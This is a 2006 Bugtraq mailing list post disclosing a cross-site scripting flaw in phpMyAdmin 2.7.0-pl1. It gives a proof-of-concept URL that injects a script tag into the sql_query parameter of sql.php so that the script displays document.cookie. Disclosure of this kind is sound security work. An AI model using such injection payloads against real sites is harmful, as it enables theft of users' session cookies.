Bugtraq mailing list archives
phpMyAdmin 2.7.0-pl1
From: kr4ch () web de
Date: 12 Apr 2006 18:50:37 -0000
App: phpMyAdmin 2.7.0-pl1 Advistory by: p0w3r Exploit: /phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&goto=tbl_properties_structure.php&back=tbl_properties_structure.php&sql_query=[XSS] Example: /phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&goto=tbl_properties_structure.php&back=tbl_properties_structure.php&sql_query=SELECT+*+FROM+%60'%3Cscript%3Ealert(document.cookie)%3C/script%3E'%60
Current thread:
- phpMyAdmin 2.7.0-pl1 kr4ch (Apr 13)
- Re: phpMyAdmin 2.7.0-pl1 Kevin Waterson (Apr 14)